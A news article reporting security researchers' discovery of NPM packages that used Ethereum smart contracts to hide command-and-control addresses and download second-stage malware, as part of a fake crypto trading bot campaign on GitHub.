Threat actors have discovered a novel method for delivering malicious software, commands, and links via Ethereum Smart Contracts, successfully evading security scans as tactics surrounding code repositories continue to evolve.
Researchers from ReversingLab, a firm specializing in digital asset compliance, have identified a new instance of open-source malware within the Node Package Manager (NPM) repository, which hosts a vast array of JavaScript packages and libraries.
The malware packages employ innovative techniques for introducing harmful software into compromised devices—specifically, smart contracts within the Ethereum Blockchain. In a blog post released on Wednesday, they outlined how two packages, Colortoolsv2 and Mimelib2, both launched in July, exploited smart contracts to conceal malicious commands that installed downloader malware on affected systems.
To circumvent security scans, the packages functioned as simple downloaders, retrieving command and control server addresses indirectly through the smart contract rather than directly hosting harmful links. Once operational, the package queries the blockchain to fetch the URL for downloading the secondary malware payload, complicating detection since the blockchain traffic seems legitimate.
New attack vector
While malware aimed at Ethereum smart contracts is not a recent phenomenon—having previously been used by the North Korea-linked Lazarus Group—what stands out now is the method of downloading secondary malware via Ethereum smart contracts. This approach, as noted by Valentić, is unprecedented, showcasing the rapid advancement of evasion techniques employed by malicious actors targeting open-source repositories and developers.
“It’s something we’ve never seen before, highlighting the rapid evolution of detection evasion strategies by malicious actors trolling open-source repositories and developers.”
Elaborate Crypto-Case Campaign
These malware packages are part of a broader and intricate social engineering campaign primarily conducted through GitHub. The perpetrators have established a fake cryptocurrency trading bot repository, aiming for a façade of reliability through fabricated commits, synthetic user accounts to garner views for the repository, multiple maintainer accounts to simulate ongoing development, and professional project descriptions to attract interest.
Threat actors are evolving
Researchers documented 23 crypto-associated malicious campaigns targeting open-source repositories in 2024. However, this latest technique marks an evolution in the methods used against such repositories. Interestingly, these attacks extend beyond Ethereum; in April, hackers distributed obscure malware that stole crypto wallet credentials disguised as a Solana trading bot repository. Additionally, they targeted “Bitcoinlib,” an open-source Python library aimed at assisting Bitcoin development.
